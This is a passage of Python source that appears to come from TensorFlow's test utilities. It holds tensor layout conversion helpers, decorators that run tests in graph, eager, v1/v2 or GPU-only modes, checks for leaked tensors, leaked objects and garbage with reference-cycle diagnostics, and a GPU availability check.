input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
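# For example, a shape list [2, 8, 8, 3] (NHWC) becomes [2, 3, 8, 8] (NCHW),
# and a 5-D shape [2, 4, 8, 8, 3] becomes [2, 3, 4, 8, 8].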
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
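# Worked shape example: [2, 8, 8, 8] is first reshaped to [2, 8, 8, 2, 4]
# (channels split into groups of 4) and then permuted to [2, 2, 8, 8, 4].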
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
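# Worked shape example (inverse of the above): [2, 2, 8, 8, 4] becomes
# [2, 8, 8, 2] after permutation and [2, 8, 8, 8] after folding the
# trailing 4 back into the channel dimension.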
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
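# Illustrative use (hypothetical test method):
#
#   @skip_if(lambda: not is_gpu_available())
#   def testNeedsGpu(self):
#     ...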
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C code
exercised by a bit of Python.
"""
def decorator(self, *args, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various versions
# of python2.7.x.
for _ in range(2):
f(self, *args, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
# In some cases (specifically on macOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" %
(new_count, previous_count))
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of refferents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
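# For example, _combine_named_parameters(mode=["graph", "eager"], use_gpu=True)
# yields [OrderedDict([("mode", "graph"), ("use_gpu", True)]),
#         OrderedDict([("mode", "eager"), ("use_gpu", True)])].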
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
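# Continuing the example above, the combination {"mode": "eager",
# "use_gpu": True} gets ("testcase_name", "_test_mode_eager_usegpu_True"),
# since non-alphanumeric characters are filtered out of both keys and values.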
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically check
the generated graph. Attempting to evaluate graph or function results via
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
raise ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and SetUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
if reset_test:
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return decorated
if func is not None:
return decorator(func)
return decorator
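# py_func_if_in_function: if the default graph is currently building a
# tf.function, f is wrapped in a tf.py_func (with Tensor/Variable arguments
# routed through the op) so the Python-side checks run when the function
# executes; otherwise f is simply called directly.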
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.get_default_graph()._building_function:
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if context.executing_eagerly():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_all_in_deprecated_graph_mode_only(cls):
"""Execute all tests in a class in graph mode."""
base_decorator = deprecated_graph_mode_only
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def with_forward_compatibility_horizons(*horizons):
"""Executes the decorated test with the specified forward-compat horizons.
Args:
*horizons: A list of (year, month, day) tuples. If the list includes
`None`, then the test will also be run with no forward-compatibility
horizon set.
Returns:
A decorator that will execute the test with the specified horizons.
"""
if not horizons:
raise ValueError("Expected at least one horizon.")
for horizon in horizons:
if not ((horizon is None) or
(len(horizon) == 3 and all(isinstance(x, int) for x in horizon))):
raise ValueError("Bad horizon value: %r" % horizon)
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`with_forward_compatibility_horizons` only "
"supports test methods.")
def decorated(self, *args, **kwargs):
for horizon in horizons:
if horizon is None:
f(self, *args, **kwargs)
else:
(year, month, day) = horizon
with forward_compatibility_horizon(year, month, day):
f(self, *args, **kwargs)
return decorated
return decorator
@deprecation.deprecated(
None, "Use `tf.config.experimental.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Warning: if a non-GPU version of the package is installed, the function will
also return False. Use `tf.test.is_built_with_cuda` to validate whether
TensorFlow was built with CUDA support.
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading (since the routine
will return true when a GPU device is available irrespective of whether TF
was built with CUDA support or ROCm support). However, no changes are made
here because:
++ Changing the name "cuda_only" to something more generic would break
backward compatibility.
++ Adding an equivalent "rocm_only" would require the implementation to check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility.
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only".
Returns:
True if a GPU device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
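# Illustrative usage sketch: gating a code path on GPU availability. The
# compute-capability pair below is only an example value.
#
#   if is_gpu_available(cuda_only=True, min_cuda_compute_capability=(7, 0)):
#     dev = "/device:GPU:0"
#   else:
#     dev = "/device:CPU:0"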
